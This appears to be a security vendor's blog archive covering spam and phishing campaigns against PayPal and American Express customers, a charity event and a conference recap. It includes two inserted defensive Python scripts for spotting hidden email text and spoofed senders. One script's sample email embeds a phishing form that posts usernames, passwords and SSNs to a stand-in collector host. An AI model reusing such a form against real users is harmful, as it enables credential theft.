Who doesn’t recall at some point seeing a late night television infomercial pitching some sort of “miracle” product that you just have to have? How about a magical pill that had the power to melt away those unwanted pounds or give you all the energy you could possibly want? These types of snake oil products aren’t just doomed to be promoted through infomercials. Email spammers want their share of the profits also. The security research team at AppRiver spotted a snake oil campaign earlier this week. The email blast is a marketing email for a “brain enhancement” pill that claims to help you “think like Bill Gates.”

The email is cleverly disguised in a newsletter format reminiscent of what larger media publications use. Besides the outlandish claims inside the message, the spammers also injected random, hidden text into the email to trick spam filters into classifying it as legitimate. This is known as text stuffing.
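Text stuffing works because a filter scoring the raw HTML sees the padding while a human reader never does. One defensive check is therefore to measure how much of the message text lives inside elements a reader cannot see. The scanner below is an added example, not AppRiver's or SecureTide's code; the sample newsletter is constructed, and the set of hiding styles and the 30% threshold are assumptions a filter author would tune.

```python
"""Detect 'text stuffing': hidden filler text injected into an HTML email
to skew spam-filter statistics. Added example; the sample message is
constructed and the style list / threshold are assumptions."""
from html.parser import HTMLParser
import re

# CSS fragments that make text invisible to a reader (assumed list; colour
# matching against the background is deliberately not attempted here).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|font-size\s*:\s*0(?:px|pt|em|%)?\s*(?:;|$)"
    r"|opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)",
    re.I,
)


class StuffingScanner(HTMLParser):
    """Collects visible and hidden text separately by tracking open tags."""

    def __init__(self):
        super().__init__()
        self.stack = []        # (tag, started_hidden_region) per open element
        self.hidden_depth = 0  # > 0 while inside an invisible element
        self.skip = 0          # > 0 while inside <style>/<script>
        self.visible, self.hidden = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("style", "script"):
            self.skip += 1
        hidden = "hidden" in a or bool(HIDDEN_STYLE.search(a.get("style") or ""))
        self.stack.append((tag, hidden))
        if hidden:
            self.hidden_depth += 1

    def handle_endtag(self, tag):
        if tag in ("style", "script"):
            self.skip = max(0, self.skip - 1)
        if not any(t == tag for t, _ in self.stack):
            return  # stray end tag in sloppy markup: ignore it
        while self.stack:  # pop through unclosed void tags to the match
            t, hidden = self.stack.pop()
            if hidden:
                self.hidden_depth -= 1
            if t == tag:
                break

    def handle_data(self, data):
        text = data.strip()
        if self.skip or not text:
            return
        (self.hidden if self.hidden_depth else self.visible).append(text)


def scan(html, threshold=0.3):
    """Return word counts, the hidden-text ratio and a verdict for one body."""
    p = StuffingScanner()
    p.feed(html)
    p.close()
    visible = sum(len(t.split()) for t in p.visible)
    hidden = sum(len(t.split()) for t in p.hidden)
    total = visible + hidden
    ratio = hidden / total if total else 0.0
    return {
        "visible_words": visible,
        "hidden_words": hidden,
        "hidden_ratio": round(ratio, 3),
        "suspicious": ratio >= threshold,
        "hidden_sample": p.hidden[:3],
    }


# Constructed sample: a "newsletter" pitch padded with unrelated hidden text.
SAMPLE_EMAIL = """<html><body>
<h1>Think like a billionaire with BrainMax!</h1>
<p>Order today and get 75% off.</p>
<div style="display:none">quarterly earnings report schedule meeting agenda minutes</div>
<span style="font-size:0px">weather forecast partly cloudy temperature tomorrow</span>
<p style="color:#ffffff;">invisible only by colour, not caught here</p>
</body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE_EMAIL))
```

The last paragraph of the sample is counted as visible: white-on-white text is only detectable once the effective background colour is known, so a production filter would pair this ratio with rendering-based checks. Running `scan(SAMPLE_EMAIL)` reports 19 visible words against 13 hidden ones, a hidden ratio above the threshold, and flags the message.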


The email contains a link to a website that goes into more detail about the brain enhancement product. The website again is mocked up to resemble a news publication, along with a fake Facebook “Like” counter, Amazon product reviews, excerpts from clinical case studies and more. After a few seconds on the site, we were prompted to purchase the product at 75% off.


While not your typical malware threat, snake oil campaigns can be destructive in their own right, usually financially. It’s always best to get independent verification on marketing emails like these if you decide to try a product or service you’re unfamiliar with. A quick Google search can usually provide hints at the legitimacy of an email blast such as this. Because the campaign used tactics common among spammers, such as text stuffing, multiple sending domains and questionable data, the legitimacy of this email blast should be questioned.

AppRiver’s SecureTide spam & virus filter has quarantined around 14,300+ of these messages so far, preventing them from reaching our customers’ inboxes.

This week’s Threat Thursday focuses on a newly spotted social engineering campaign targeting American Express customers. The email blast seeks to trick users into providing highly sensitive information such as their social security number, credit card information and other personal identifiers. The email informs the recipient that a phone call requesting a one-time password was made to them regarding a recent transaction. Those who did not receive a phone call are instructed to click on the provided link in the message, which directs to an exploited website.


The exploited site is an accurate recreation of American Express’ website. The throw-away domain for this campaign was created one week ago. This of course is a huge red flag. In the screenshots below, the cyber criminals seek to obtain various personal information from American Express customers. It’s highly unusual for a financial institution to ask for this amount of information for account verification purposes.




Once all of the information has been filled out and submitted, the website redirects to the official American Express homepage. This campaign was well thought out and executed. Besides the information presented above, another red flag our security research team noticed was the sender’s address of the email, which was spoofed to appear to come from a legitimate Amex email address. The originating IP addresses and the language used in the campaign also provided hints about the legitimacy of this message.

AppRiver’s SecureTide filter has various rules in place to keep these messages from reaching our customers. 8600+ emails have been blocked at the time of this writing.


From left: Wounded Veteran and comedian Bobby Henline, Gold Star Dad Tim Scherer, Sr., and AppRiver executive vice president Rocco Donnino.

This past weekend, AppRiver was proud to honor true heroes during the 4th annual Cow Harbor Warrior Weekend in Northport, Long Island, New York. The three-day weekend of appreciation, recreation and celebration welcomed and honored twelve veterans and their family members and included a golf tournament, 4-mile warrior run, beach activities, clambake fundraiser and live entertainment from Common Ground and the inspiring comedian Bobby Henline, as well as wonderful food and fellowship throughout. We recognize that genuine heroes live among us in every community throughout the United States and it was an honor to show our appreciation not only for their sacrifice, but also for the inspiration they provide.

Cow Harbor Warriors is a 501(c)(3) non-profit organization that was founded in 2012 by AppRiver executive vice president Rocco Donnino for the purpose of honoring and enabling individuals who served in Operation Iraqi Freedom and Operation Enduring Freedom. With the Cow Harbor Warrior Weekend, as well as other fundraising efforts and events, the organization strives to raise awareness for and to support wounded veterans/veterans in need. For more information about Cow Harbor Warriors, please visit www.cowharborwarriors.com.

While summer evokes nostalgia for beaches, volleyball, and sunscreen for many, white hats look forward to a different kind of trip every summer. Every summer brings the anticipation of what is known as “Hacker Summer Camp” to mind. This year did not let us down. For those of you who are not familiar with this, Las Vegas is the scene of what amounts to the largest gathering of hackers and InfoSec enthusiasts in the world. Three big conferences, BSides Las Vegas, BlackHat and DEF CON, all take place over the course of a week in late July / early August. This year’s events took place during the week of August 1st, 2016, starting with BSides Las Vegas. I was fortunate enough to be able to attend BSides Las Vegas and DEF CON.

BSides Las Vegas is an amazing conglomeration of everything security from CTF (Capture the Flag) competitions with the Pros vs. Joes event to the Lockpick Village and The Hacker Pyramid and other interesting contests run by the vendors that participate. Vendors that participate are more interested in what you have to offer them as opposed to what they can sell you. Most, if not all, the vendors participated in the Hire Ground track which offered extensive help to those wanting to find work or simply hone their resumes and interviewing skills.

The talks are categorized into well-defined tracks that each have an underlying theme. Each talk is recorded and can be found on YouTube. I was fortunate to be accepted to give a talk this year in the Proving Ground track. My talk can be found here if you are interested. In addition to my talk, there were more than 100 other talks and panels given by some amazingly talented people spread throughout seven different tracks. One of the tracks was made up entirely of workshops and classes. The best part is that everything is 100% free! That’s right, just show up and get a badge and away you go. Some of the topics include:

These are but a few of the great talks and workshops presented at BSides Las Vegas. Some talks are quite sensitive in nature, are given under strict security and are not filmed or recorded in any way. Aside from the talk content and insight, this conference is small enough for more one-on-one interaction and discussion away from the tracks. It is often in these dialogues that you learn the most and expand your network of contacts and colleagues.

There are also a multitude of social events including a pool party, the Super Soaked Hackers water balloon fight benefiting Hack4Kids, the ever exciting Hacker Pyramid and various auctions benefiting EFF and BSides Las Vegas.

I arrived a day early so that I could participate in the speaker practice session on Monday afternoon. Tuesday and Wednesday were filled with time attending talks, presenting, visiting the many vendors and learning tables, interacting with people I hadn’t seen since previous events and socializing. You have to be somewhat organized and plan ahead so that you can maximize your time and get the most out of the time spent. I will still be going back and reviewing the videos of talks that were of interest but conflicted with other commitments. What you learn at an event like this is far more than you might expect. Digesting everything and putting it to use means going back later and reviewing or rehashing talks and extracting those pearls that make your life in InfoSec easier.

Attending conferences like BSides Las Vegas helps expand your vision and view of the world, helping you better understand what is trending in the world of InfoSec. This year was my second time attending and I already plan on returning next summer.

If you are a regular DEF CON or BlackHat attendee, make plans to come a few days early and check out BSides Las Vegas. The costs are minimal. You will be pleasantly surprised. I will discuss my DEF CON adventures in an upcoming post.


An onslaught of PayPal themed messages has been hitting our filters over the past few weeks. Attached (.)HTM/HTML files have been used to distribute malware and phishing attacks for the better part of a decade now. This file type is still considered relatively low risk since such files are still shared for legitimate purposes quite regularly, despite the fact that they are used for evil with even greater regularity.

One particular variant poses as a security alert from PayPal. It utilizes an attached (.)HTM file (containing an embedded script) in an attempt to trick users into disclosing a bevy of personal and financial information. Thus far, we have quarantined roughly 250K messages from this particular campaign. In addition to phishing a potentially devastating amount of information from the target, beneath the surface the obfuscated script also serves to install malware onto the victim’s machine.

Clicking the attached (.)HTM file begins the process. The phishing pages rendered attempt to gather a great deal of information such as PayPal credentials, mother’s maiden name, social security and credit card data– in a series of three consecutive phishing pages (displayed below).

page 1

page 2


page 3
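Both campaigns on this page leave traces that can be checked mechanically before a user ever opens the message: the Amex lure's spoofed sender does not line up with the path the mail actually took, and the PayPal lure carries an HTM attachment whose embedded script and credential form have no business in a "security alert". The triage script below is an added example, not AppRiver's or SecureTide's code; the .eml it parses is constructed, and every domain, address and IP in it is made up. It assumes only the Python standard library.

```python
"""Triage a suspicious .eml: report sender-header misalignment (a spoofed
From address) and inspect .htm/.html attachments for embedded scripts and
credential forms. Added example; the message is constructed and all
domains/IPs in it are invented."""
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed sample: a "security alert" whose From header claims one domain
# while the bounce path, reply address and attachment point elsewhere.
SAMPLE_EML = """\
Return-Path: <bounce@mail-throwaway-7721.example>
Received: from mail-throwaway-7721.example (mail-throwaway-7721.example [203.0.113.45])
\tby mx.recipient.example with ESMTP; Fri, 09 Sep 2016 09:55:29 -0500
From: "Example Bank Security" <alerts@bank.example>
Reply-To: verify@bank-secure-login.example
To: customer@recipient.example
Subject: Security Alert: confirm your one-time password
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

We called you about a recent transaction. If you did not receive the call,
open the attached form to verify your account.
--b1
Content-Type: text/html; name="security_alert.htm"
Content-Disposition: attachment; filename="security_alert.htm"

<html><body><script>var k=unescape('%3Cform%20action');</script>
<form action="http://collect.bank-secure-login.example/p.php" method="post">
<input name="user"><input type="password" name="pass"><input name="ssn">
</form></body></html>
--b1--
"""

HTML_TYPES = {"text/html", "application/xhtml+xml"}


def domain_of(header_value):
    """Lower-cased domain of the first address in a header, or ''."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rpartition("@")[2].lower()


def triage(raw_eml):
    """Return a list of human-readable findings for one raw message."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []

    # 1. Sender alignment: Return-Path / Reply-To should match the From domain.
    from_dom = domain_of(msg["From"])
    for hdr in ("Return-Path", "Reply-To"):
        d = domain_of(msg[hdr])
        if d and d != from_dom:
            findings.append(f"{hdr} domain {d!r} does not match From domain {from_dom!r}")

    # 2. Originating IP: the bottom-most Received header is closest to the sender.
    received = msg.get_all("Received") or []
    if received:
        m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", str(received[-1]))
        if m:
            findings.append(f"originating IP {m.group(1)}")

    # 3. HTML attachments: scripts and forms that collect credentials.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not (name.endswith((".htm", ".html")) or part.get_content_type() in HTML_TYPES):
            continue
        body = part.get_content()
        if isinstance(body, bytes):
            body = body.decode("utf-8", "replace")
        if re.search(r"<script\b", body, re.I):
            findings.append(f"attachment {name}: embedded <script>")
        for action in re.findall(r"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", body, re.I):
            findings.append(f"attachment {name}: form posts to {action}")
        if re.search(r"type\s*=\s*[\"']?password", body, re.I):
            findings.append(f"attachment {name}: password field")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_EML):
        print("-", line)
```

On the constructed message the script reports six findings: the Return-Path and Reply-To domains disagree with the From domain, the originating IP is extracted from the Received header, and the attachment is flagged for its script, for a form posting to an unrelated host, and for a password field. Header misalignment alone is not proof of spoofing (mailing-list and bulk senders legitimately differ), so these findings are meant to feed a score or an analyst queue rather than to block on their own.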


Remember, a legitimate security alert should never require direct interaction with an email attachment. Should you ever find yourself on the receiving end of a message of this nature, reach out to the company directly to voice your concern.

If you suspect you may have fallen victim to phishing or think your credentials have been exposed through some other means (such as a data breach), you should take immediate proactive measures to help reduce the potential impact. Always contact the provider immediately for their recommended course of action. Change your password not only for the affected account but also for any others where you may be using the same or similar password… but surely no one is doing that… right?